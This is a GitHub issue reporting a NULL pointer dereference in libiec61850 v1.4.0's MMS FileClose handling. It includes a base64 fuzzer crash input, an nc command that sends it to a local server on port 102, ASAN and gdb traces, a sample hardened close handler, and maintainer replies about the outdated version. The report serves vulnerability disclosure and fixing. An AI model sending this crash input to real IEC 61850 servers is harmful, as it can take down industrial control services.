
NULL Pointer Dereference was detected in the mmsServer_handleFileCloseRequest.c function of src/mms/iso_mms/server/mms_file_service.c. #496

Closed
Alice-and-Bob opened this issue Feb 27, 2024 · 4 comments

@Alice-and-Bob

Description

A NULL Pointer Dereference was detected in the mmsServer_handleFileCloseRequest function of src/mms/iso_mms/server/mms_file_service.c. The vulnerability manifests as a SEGV and causes the application to crash.

version

v1.4.0 and earlier release

system information

ubuntu18.04

proof of concept

poc

```
root@VirtualBox:/home/yang/AFL/out/crashes# base64 poc
AwAAQALwgAEAAQBhMzAxAgEAoCygKgICAImkAH9KAaEfoB0wG6AZoRcaC1RFTVBMQVRFTEQwGghT
UFZUMyRNWA==
```

command

```sh
cd path/to/libiec61850-v1.4.0/examples/server_example_substitution
sudo ./server_example_substitution

cat poc | nc 0.0.0.0 102
```

result

```
Using libIEC61850 version 1.4.0
Connection opened
ASAN:DEADLYSIGNAL
=================================================================
==3572==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55555c32d37f bp 0x7f01d2ffc810 sp 0x7f01d2ffc7d0 T3)
==3572==The signal is caused by a READ memory access.
==3572==Hint: address points to the zero page.
    #0 0x55555c32d37e in mmsServer_handleFileCloseRequest src/mms/iso_mms/server/mms_file_service.c:860
    #1 0x55555c3306ce in handleConfirmedRequestPdu src/mms/iso_mms/server/mms_server_connection.c:242
    #2 0x55555c3326b4 in MmsServerConnection_parseMessage src/mms/iso_mms/server/mms_server_connection.c:655
    #3 0x55555c332838 in messageReceived src/mms/iso_mms/server/mms_server_connection.c:696
    #4 0x55555c386319 in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:307
    #5 0x55555c386faa in handleTcpConnection src/mms/iso_server/iso_connection.c:442
    #6 0x55555c31ed99 in destroyAutomaticThread hal/thread/linux/thread_linux.c:90
    #7 0x7f01d78696da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #8 0x7f01d71f461e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12161e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_mms/server/mms_file_service.c:860 in mmsServer_handleFileCloseRequest
Thread T3 created by T1 here:
    #0 0x7f01d7ab8d2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55555c31ee24 in Thread_start hal/thread/linux/thread_linux.c:101
    #2 0x55555c3876bb in IsoConnection_start src/mms/iso_server/iso_connection.c:532
    #3 0x55555c383f3e in handleIsoConnections src/mms/iso_server/iso_server.c:414
    #4 0x55555c384135 in isoServerThread src/mms/iso_server/iso_server.c:493
    #5 0x7f01d78696da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)

Thread T1 created by T0 here:
    #0 0x7f01d7ab8d2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55555c31eec8 in Thread_start hal/thread/linux/thread_linux.c:105
    #2 0x55555c384708 in IsoServer_startListening src/mms/iso_server/iso_server.c:611
    #3 0x55555c328149 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:458
    #4 0x55555c31b730 in IedServer_start src/iec61850/server/impl/ied_server.c:612
    #5 0x55555c30636e in main /home/yang/iec61850/libiec61850-1.4.0-asan/examples/server_example_substitution/server_example_substitution.c:188
    #6 0x7f01d70f4c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)

==3572==ABORTING
```

gdb

```
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from server_example_substitution...done.
(gdb) r
Starting program: /home/yang/iec61850/libiec61850-1.4.0-asan/examples/server_example_substitution/server_example_substitution 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using libIEC61850 version 1.4.0
[New Thread 0x7ffff32ff700 (LWP 4150)]
[New Thread 0x7ffff2afe700 (LWP 4151)]
Connection opened
[New Thread 0x7ffff22fd700 (LWP 4850)]

Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff22fd700 (LWP 4850)]
0x00005555555a837f in mmsServer_handleFileCloseRequest (connection=0x61100000ff40, buffer=0x63100001480d "\240*\002\002", bufPos=11, maxBufPos=12, invokeId=137, response=0x7ffff22fcb50) at src/mms/iso_mms/server/mms_file_service.c:860
860	    FileSystem_closeFile(frsm->fileHandle);
(gdb) print frsm->fileHandle
Cannot access memory at address 0x10
(gdb) 
```
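The gdb output above shows the pattern behind the crash: `frsm` is NULL, so reading `frsm->fileHandle` faults at a zero-page address equal to the field's offset (0x10 here). As an added example that is not libiec61850's code and not part of this report, the simplified close handler below looks the file-read state machine up by the id a client supplies and answers with an error instead of dereferencing a missing entry; every type, field and function name (FakeFile, FileReadStateMachine, lookupFrsm, handleFileClose, the RESP_* codes) is a hypothetical stand-in.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins, not the library's real definitions. */
typedef struct { bool open; } FakeFile;          /* plays the role of FileHandle */
typedef struct {
    int32_t   frsmId;      /* id the client echoes back in a FileClose request */
    FakeFile* fileHandle;  /* NULL while the slot is unused */
} FileReadStateMachine;
#define MAX_FRSMS 4
typedef struct { FileReadStateMachine frsms[MAX_FRSMS]; } ServerConnection;
enum { RESP_OK = 0, RESP_ERR_FILE_NOT_OPEN = 1, RESP_ERR_NO_FREE_SLOT = 2 };

/* The address a NULL-based read of fileHandle would fault on: the field's offset.
 * The report shows 0x10 for the real struct; this assumed layout gives 8. */
size_t nullDerefFaultAddress(void) { return offsetof(FileReadStateMachine, fileHandle); }

/* Returns NULL when the id matches no open state machine on this connection. */
FileReadStateMachine* lookupFrsm(ServerConnection* conn, int32_t frsmId)
{
    for (int i = 0; i < MAX_FRSMS; i++)
        if (conn->frsms[i].fileHandle != NULL && conn->frsms[i].frsmId == frsmId)
            return &conn->frsms[i];
    return NULL;
}

/* Claims a free slot for an opened file; refuses when all slots are in use. */
int openFrsm(ServerConnection* conn, int32_t frsmId, FakeFile* f)
{
    for (int i = 0; i < MAX_FRSMS; i++)
        if (conn->frsms[i].fileHandle == NULL) {
            conn->frsms[i].frsmId = frsmId;
            conn->frsms[i].fileHandle = f;
            f->open = true;
            return RESP_OK;
        }
    return RESP_ERR_NO_FREE_SLOT;
}

/* Hardened close: an unknown or already-closed id yields an error response
 * rather than the unchecked frsm->fileHandle read that crashed at line 860. */
int handleFileClose(ServerConnection* conn, int32_t frsmId)
{
    FileReadStateMachine* frsm = lookupFrsm(conn, frsmId);
    if (frsm == NULL)
        return RESP_ERR_FILE_NOT_OPEN;
    frsm->fileHandle->open = false;
    frsm->fileHandle = NULL;   /* release the slot so a repeated close is rejected too */
    return RESP_OK;
}
```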

@Alice-and-Bob
Author

Hi @mzillgith and team. If you handle the error as soon as possible, I will provide all possible information.

@mzillgith
Contributor

Hi,
I cannot reproduce this issue with a recent version of the library. So probably it has been fixed in the meantime.

@Alice-and-Bob
Author

This vulnerability exists in release 1.4.0 and earlier, so you may be using the wrong version of the code.

@mzillgith
Contributor

Ok. So I don't know what to do about that. Version 1.4.0 is outdated and had various updates. And now it's no longer maintained.
